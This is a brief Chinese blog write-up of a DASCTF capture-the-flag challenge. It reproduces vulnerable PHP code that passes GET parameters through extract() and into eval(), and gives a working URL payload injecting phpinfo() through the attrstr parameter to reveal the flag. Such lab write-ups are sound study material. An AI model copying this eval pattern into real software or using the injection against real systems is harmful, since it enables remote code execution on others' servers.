[DASCTF Oct] 迷路的魔法少女
阿新 • • 發佈:2021-11-24
簡單的程式碼注入,但是因為太懶了,十月打的比賽十一月底才想起來寫個Wp,以後再也不當懶狗了
題目:
<?php highlight_file('index.php'); extract($_GET); error_reporting(0); function String2Array($data) { if($data == '') return array(); @eval("\$array = $data;"); return $array; } if(is_array($attrid) && is_array($attrvalue)) { $attrstr .= 'array('; $attrids = count($attrid); for($i=0; $i<$attrids; $i++) { $attrstr .= '"'.intval($attrid[$i]).'"=>'.'"'.$attrvalue[$i].'"'; if($i < $attrids-1) { $attrstr .= ','; } } $attrstr .= ');'; } String2Array($attrstr);
在String2Array()
處存在一個程式碼執行點,然後下面的就是一個簡單的語句拼接,本地測一下就可以實現程式碼注入,最終構造出:
http://5d3c1779-4050-423d-8a56-405a2aa1a462.node4.buuoj.cn:81/?attrid[]=0&attrvalue[]=0&attrstr=phpinfo();//
然後在phpinfo的常量中找到flag:
[ * ]部落格中轉載的文章均已標明出處與來源,若無意產生侵權行為深表歉意,需要刪除或更改請聯絡博主: 2245998470[at]qq.com